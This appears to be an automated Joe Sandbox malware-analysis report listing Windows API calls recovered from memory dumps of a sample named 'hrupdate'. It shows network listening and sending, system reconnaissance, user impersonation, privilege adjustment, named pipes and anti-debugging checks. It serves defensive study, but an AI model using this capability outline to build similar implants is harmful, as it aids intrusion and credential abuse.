                                                                • API ID: AllocateErrorHeapLast_mallochtonlrecvfrom
                                                                • String ID:
                                                                • API String ID: 987280018-0

                                                                APIs
                                                                • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00B027F7,00000000,00000000,?,?,?,00000000), ref: 00B02DD7
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00B027F7,00000000,00000000,?,?,?,00000000), ref: 00B02DE4
                                                                • _CxxThrowException.VCRUNTIME140(00000000,00B04C5C,00000000), ref: 00B0328C
                                                                • _CxxThrowException.VCRUNTIME140(00000000,00B04CB0,00000000), ref: 00B032A9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow$_callnewhmalloc
                                                                • String ID: Unknown exception
                                                                • API String ID: 4113974480-410509341
                                                                APIs
                                                                  • Part of subcall function 04FC62DB: WSAStartup.WS2_32(00000202,?), ref: 04FC62FC
                                                                  • Part of subcall function 04FC62DB: WSACleanup.WS2_32 ref: 04FC6306
                                                                • WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 04FC63AC
                                                                • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,00000001,00000000,00000000), ref: 04FC63D7
                                                                • closesocket.WS2_32(00000000), ref: 04FC6416
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CleanupIoctlSocketStartupclosesocket
                                                                • String ID:
                                                                • API String ID: 1100289767-0
                                                                APIs
                                                                • InternetSetOptionA.WININET(00000000,00000005,0003A980,00000004), ref: 04FC5C21
                                                                • InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 04FC5C31
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: InternetOption
                                                                • String ID:
                                                                • API String ID: 3327645240-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc_memset
                                                                • String ID:
                                                                • API String ID: 4137368368-0
                                                                APIs
                                                                  • Part of subcall function 04FC5BC4: InternetSetOptionA.WININET(00000000,00000005,0003A980,00000004), ref: 04FC5C21
                                                                  • Part of subcall function 04FC5BC4: InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 04FC5C31
                                                                • InternetSetOptionA.WININET(00000000,0000002B,00000000,00000000), ref: 04FC5CA1
                                                                • InternetSetOptionA.WININET(0000002C,00000000,00000000), ref: 04FC5CBD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: InternetOption
                                                                • String ID:
                                                                • API String ID: 3327645240-0
                                                                APIs
                                                                • HeapCreate.KERNEL32(00040000,00000000,00000000,?,00000004,?), ref: 030DC0A3
                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 030DC0B8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_3_30d0000_hrupdate.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateCreate
                                                                • String ID:
                                                                • API String ID: 2875408731-0
                                                                APIs
                                                                  • Part of subcall function 04FCC902: htonl.WS2_32(04FC389E), ref: 04FCC93C
                                                                  • Part of subcall function 04FCC902: select.WS2_32(00000000,?,?,?,?), ref: 04FCC9A0
                                                                  • Part of subcall function 04FCC902: __WSAFDIsSet.WS2_32(34E85900,?), ref: 04FCC9BC
                                                                  • Part of subcall function 04FCC902: accept.WS2_32(34E85900,00000000,00000000), ref: 04FCC9D1
                                                                  • Part of subcall function 04FCC902: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 04FCC9E4
                                                                • GetTickCount.KERNEL32 ref: 04FCCD97
                                                                  • Part of subcall function 04FCCC39: _malloc.LIBCMT ref: 04FCCC5D
                                                                  • Part of subcall function 04FCCC39: htonl.WS2_32(6083960B), ref: 04FCCC89
                                                                  • Part of subcall function 04FCCC39: recvfrom.WS2_32(?,B0C25DAC,000FFFFC,00000000,?,?), ref: 04FCCCB8
                                                                  • Part of subcall function 04FCCC39: WSAGetLastError.WS2_32 ref: 04FCCCC3
                                                                • GetTickCount.KERNEL32 ref: 04FCCDAA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTickhtonl$ErrorLast_mallocacceptioctlsocketrecvfromselect
                                                                • String ID:
                                                                • API String ID: 597769433-0
                                                                APIs
                                                                • _calloc.LIBCMT ref: 04FD5F2C
                                                                  • Part of subcall function 04FEBB50: __calloc_impl.LIBCMT ref: 04FEBB65
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: __calloc_impl_calloc
                                                                • String ID:
                                                                • API String ID: 2108883976-0
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,030DBCAB,AAAABBBB,?,?,?,?), ref: 030DC3D6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000003.1737791029.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_3_30d0000_hrupdate.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                APIs
                                                                • InternetConnectA.WININET(0BC9BF25,?,?,00000000,00000000,00000003,00000000,05009668), ref: 04FC48B5
                                                                  • Part of subcall function 04FC9042: _malloc.LIBCMT ref: 04FC9048
                                                                  • Part of subcall function 04FC9042: _malloc.LIBCMT ref: 04FC909F
                                                                  • Part of subcall function 04FC8F1A: _malloc.LIBCMT ref: 04FC8F5B
                                                                  • Part of subcall function 04FC8F1A: _memset.LIBCMT ref: 04FC8F6C
                                                                  • Part of subcall function 04FC8F1A: _memset.LIBCMT ref: 04FC8FB7
                                                                  • Part of subcall function 04FC8F1A: _memset.LIBCMT ref: 04FC900C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc_memset$ConnectInternet
                                                                APIs
                                                                • HeapDestroy.KERNEL32(?), ref: 04FCE6B2
                                                                  • Part of subcall function 04FD05AD: _memset.LIBCMT ref: 04FD05CD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: DestroyHeap_memset
                                                                APIs
                                                                • InternetOpenA.WININET(?,?,04FC3826,00000000,00000000), ref: 04FC47EB
                                                                  • Part of subcall function 04FC9042: _malloc.LIBCMT ref: 04FC9048
                                                                  • Part of subcall function 04FC9042: _malloc.LIBCMT ref: 04FC909F
                                                                  • Part of subcall function 04FC8F1A: _malloc.LIBCMT ref: 04FC8F5B
                                                                  • Part of subcall function 04FC8F1A: _memset.LIBCMT ref: 04FC8F6C
                                                                  • Part of subcall function 04FC8F1A: _memset.LIBCMT ref: 04FC8FB7
                                                                  • Part of subcall function 04FC8F1A: _memset.LIBCMT ref: 04FC900C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc_memset$InternetOpen
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FD90EF
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap_malloc
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943261840.00000000030D0000.00000020.00000800.00020000.00000000.sdmp, Offset: 030D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_30d0000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                APIs
                                                                • Sleep.KERNEL32(433D8FB7,00000000,04FC398F), ref: 04FC8ACF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FC884B
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • _memset.LIBCMT ref: 04FC8857
                                                                  • Part of subcall function 04FC48BF: _malloc.LIBCMT ref: 04FC48C5
                                                                  • Part of subcall function 04FC490F: htonl.WS2_32(00000000), ref: 04FC4915
                                                                • _strncmp.LIBCMT ref: 04FC88A6
                                                                • GetCurrentDirectoryA.KERNEL32(00004000,00000000), ref: 04FC88B4
                                                                  • Part of subcall function 04FDD93E: __lock.LIBCMT ref: 04FDD95C
                                                                  • Part of subcall function 04FDD93E: ___sbh_find_block.LIBCMT ref: 04FDD967
                                                                  • Part of subcall function 04FDD93E: ___sbh_free_block.LIBCMT ref: 04FDD976
                                                                  • Part of subcall function 04FDD93E: HeapFree.KERNEL32(00000000,?,04FF85B0,0000000C,04FE0056,00000000,04FF8760,0000000C,04FE0090,?,?,?,04FEB35D,00000004,04FF8A70,0000000C), ref: 04FDD9A6
                                                                  • Part of subcall function 04FDD93E: GetLastError.KERNEL32(?,04FEB35D,00000004,04FF8A70,0000000C,04FE6A28,?,?,00000000,00000000,00000000,?,04FDF5CF,00000001,00000214), ref: 04FDD9B7
                                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 04FC88E5
                                                                • GetLastError.KERNEL32 ref: 04FC88F2
                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 04FC893E
                                                                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 04FC894E
                                                                • FindNextFileA.KERNEL32(00000000,00000010), ref: 04FC89E1
                                                                • FindClose.KERNEL32(00000000), ref: 04FC89F0
                                                                  • Part of subcall function 04FC4A19: _vwprintf.LIBCMT ref: 04FC4A23
                                                                  • Part of subcall function 04FC4A19: _vswprintf_s.LIBCMT ref: 04FC4A47
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Time$FileFind$ErrorHeapLastSystem_malloc$AllocateCloseCurrentDirectoryFirstFreeLocalNextSpecific___sbh_find_block___sbh_free_block__lock_memset_strncmp_vswprintf_s_vwprintfhtonl
                                                                APIs
                                                                • _malloc.LIBCMT ref: 04FCE551
                                                                  • Part of subcall function 04FDDA1B: __FF_MSGBANNER.LIBCMT ref: 04FDDA3E
                                                                  • Part of subcall function 04FDDA1B: __NMSG_WRITE.LIBCMT ref: 04FDDA45
                                                                  • Part of subcall function 04FDDA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 04FDDA92
                                                                • __snprintf.LIBCMT ref: 04FCE562
                                                                • FindFirstFileA.KERNEL32(00000000,04FC86DC,?,04FCE633,04FC86DC,?,Function_0000565A), ref: 04FCE56F
                                                                  • Part of subcall function 04FDD93E: __lock.LIBCMT ref: 04FDD95C
                                                                  • Part of subcall function 04FDD93E: ___sbh_find_block.LIBCMT ref: 04FDD967
                                                                  • Part of subcall function 04FDD93E: ___sbh_free_block.LIBCMT ref: 04FDD976
                                                                  • Part of subcall function 04FDD93E: HeapFree.KERNEL32(00000000,?,04FF85B0,0000000C,04FE0056,00000000,04FF8760,0000000C,04FE0090,?,?,?,04FEB35D,00000004,04FF8A70,0000000C), ref: 04FDD9A6
                                                                  • Part of subcall function 04FDD93E: GetLastError.KERNEL32(?,04FEB35D,00000004,04FF8A70,0000000C,04FE6A28,?,?,00000000,00000000,00000000,?,04FDF5CF,00000001,00000214), ref: 04FDD9B7
                                                                • _malloc.LIBCMT ref: 04FCE5AE
                                                                • __snprintf.LIBCMT ref: 04FCE5C3
                                                                  • Part of subcall function 04FCE507: _malloc.LIBCMT ref: 04FCE512
                                                                  • Part of subcall function 04FCE507: __snprintf.LIBCMT ref: 04FCE526
                                                                • FindNextFileA.KERNEL32(000000FF,04FC86DC,?,?,?,?,?,?,?), ref: 04FCE5F0
                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 04FCE5FD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
                                                                APIs
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF65
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF75
                                                                • GetUserNameA.ADVAPI32(?,?), ref: 04FCBD08
                                                                • GetComputerNameA.KERNEL32(?,?), ref: 04FCBD18
                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000100,?,?,?,?,?,?,?,?,?,00000000), ref: 04FCBD2C
                                                                • _strrchr.LIBCMT ref: 04FCBD3B
                                                                • GetVersionExA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04FCBD56
                                                                • __snprintf.LIBCMT ref: 04FCBDCB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Name$_malloc$ComputerFileModuleUserVersion__snprintf_strrchr
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(04FF669C,04FF6688,04FC9F20,00000000), ref: 04FCA1F3
                                                                • GetProcAddress.KERNEL32(00000000), ref: 04FCA1FA
                                                                  • Part of subcall function 04FCA122: _malloc.LIBCMT ref: 04FCA141
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04FCA229
                                                                • Thread32First.KERNEL32(00000000,0000001C), ref: 04FCA23E
                                                                • Thread32Next.KERNEL32(00000000,0000001C), ref: 04FCA286
                                                                • Sleep.KERNEL32(000000C8,00000004,00000000), ref: 04FCA29D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: Thread32$AddressCreateFirstHandleModuleNextProcSleepSnapshotToolhelp32_malloc
                                                                APIs
                                                                • htonl.WS2_32 ref: 04FCC49E
                                                                • htons.WS2_32(?), ref: 04FCC4AE
                                                                • socket.WS2_32(00000002,00000002,00000000), ref: 04FCC4C4
                                                                • closesocket.WS2_32(00000000), ref: 04FCC4D1
                                                                • bind.WS2_32(00000000,?,00000010), ref: 04FCC4FF
                                                                • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 04FCC516
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: bindclosesockethtonlhtonsioctlsocketsocket
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FC6BF9
                                                                • Sleep.KERNEL32(000003E8), ref: 04FC6C69
                                                                • GetTickCount.KERNEL32 ref: 04FC6C6F
                                                                • Sleep.KERNEL32(000003E8), ref: 04FC6C82
                                                                • closesocket.WS2_32(00000000), ref: 04FC6C89
                                                                • send.WS2_32(00000000,?,?,00000000), ref: 04FC6C9C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountSleepTick$closesocketsend
                                                                APIs
                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 04FCC3B7
                                                                • htons.WS2_32(?), ref: 04FCC3D3
                                                                • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 04FCC3EC
                                                                • closesocket.WS2_32(00000000), ref: 04FCC3F7
                                                                • bind.WS2_32(00000000,?,00000010), ref: 04FCC405
                                                                • listen.WS2_32(00000000,?), ref: 04FCC413
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: bindclosesockethtonsioctlsocketlistensocket
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 04FE936D
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04FE9382
                                                                • UnhandledExceptionFilter.KERNEL32(04FF0C54), ref: 04FE938D
                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 04FE93A9
                                                                • TerminateProcess.KERNEL32(00000000), ref: 04FE93B0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                • String ID:
                                                                • API String ID: 2579439406-0
                                                                APIs
                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 04FD3FB6
                                                                • closesocket.WS2_32(00000000), ref: 04FD3FC3
                                                                • htons.WS2_32(?), ref: 04FD3FD4
                                                                • bind.WS2_32(00000000,?,00000010), ref: 04FD3FEB
                                                                • listen.WS2_32(00000000,00000078), ref: 04FD3FFC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: bindclosesockethtonslistensocket
                                                                • String ID:
                                                                • API String ID: 564772725-0
                                                                APIs
                                                                • CreateProcessWithLogonW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,04FC7FB9,C2E8296A,83FFFFD9,74DEE010,04FC80F0), ref: 04FC7DBA
                                                                • GetLastError.KERNEL32 ref: 04FC7DCC
                                                                • _memset.LIBCMT ref: 04FC7E15
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CreateErrorLastLogonProcessWith_memset
                                                                • String ID:
                                                                • API String ID: 2584212486-0
                                                                APIs
                                                                  • Part of subcall function 04FD3070: RevertToSelf.ADVAPI32(00000100,04FD3609,00000000,?,?,04FC4B6E,?,00000000,00000000,00000000,00000100,00000100), ref: 04FD3088
                                                                • LogonUserA.ADVAPI32(?,?,?,00000009,00000003,05009F5C), ref: 04FD33EB
                                                                • GetLastError.KERNEL32 ref: 04FD33F5
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF65
                                                                  • Part of subcall function 04FCBF5F: _malloc.LIBCMT ref: 04FCBF75
                                                                  • Part of subcall function 04FC6635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,04FC80F0,?,04FC7F09,04FC80F0,?,00000400), ref: 04FC664B
                                                                  • Part of subcall function 04FC6635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,04FC80F0,04FC7F09,?,04FC7F09,04FC80F0,?,00000400,?,?,?,?,04FC80F0), ref: 04FC6664
                                                                  • Part of subcall function 04FC48BF: _malloc.LIBCMT ref: 04FC48C5
                                                                  • Part of subcall function 04FC4A19: _vwprintf.LIBCMT ref: 04FC4A23
                                                                  • Part of subcall function 04FC4A19: _vswprintf_s.LIBCMT ref: 04FC4A47
                                                                  • Part of subcall function 04FC4A58: _memset.LIBCMT ref: 04FC4A66
                                                                • ImpersonateLoggedOnUser.ADVAPI32 ref: 04FD340F
                                                                • GetLastError.KERNEL32 ref: 04FD3419
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: _malloc$ByteCharErrorLastMultiUserWide$ImpersonateLoggedLogonRevertSelf_memset_vswprintf_s_vwprintf
                                                                • String ID:
                                                                • API String ID: 744593125-0
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 04FCBC00
                                                                • Sleep.KERNEL32(000003E8), ref: 04FCBC50
                                                                • GetTickCount.KERNEL32 ref: 04FCBC56
                                                                • WSAGetLastError.WS2_32 ref: 04FCBC5C
                                                                  • Part of subcall function 04FCBBAB: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 04FCBBBD
                                                                  • Part of subcall function 04FCB387: _memset.LIBCMT ref: 04FCB3A8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CountTick$ErrorLastSleep_memsetioctlsocket
                                                                • String ID:
                                                                • API String ID: 3301373915-0
                                                                APIs
                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 04FC7851
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 04FC7874
                                                                • GetLastError.KERNEL32 ref: 04FC787E
                                                                  • Part of subcall function 04FC4A19: _vwprintf.LIBCMT ref: 04FC4A23
                                                                  • Part of subcall function 04FC4A19: _vswprintf_s.LIBCMT ref: 04FC4A47
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue_vswprintf_s_vwprintf
                                                                • String ID:
                                                                • API String ID: 2004037343-0
                                                                APIs
                                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,74DF2E90,?,?,?,04FCBE90), ref: 04FD35CE
                                                                • CheckTokenMembership.ADVAPI32(00000000,?,04FCBE90,?,?,?,04FCBE90), ref: 04FD35E3
                                                                • FreeSid.ADVAPI32(?,?,?,?,04FCBE90), ref: 04FD35F3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                • String ID:
                                                                • API String ID: 3429775523-0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $<
                                                                • API String ID: 0-428540627
                                                                APIs
                                                                • CreateNamedPipeA.KERNEL32(?,00000003,00000004,00000002,00000000,00000000,00000000,00000000), ref: 04FC78F9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2943543603.0000000004FC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FC3000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_4fc3000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: CreateNamedPipe
                                                                • String ID:
                                                                • API String ID: 2489174969-0
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_000037EE,00B02EF1), ref: 00B037E7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2942621894.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                • Associated: 00000000.00000002.2942591861.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942653485.0000000000B04000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942691161.0000000000B06000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B07000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.2942715689.0000000000B20000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_b00000_hrupdate.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                Memory Dump Source
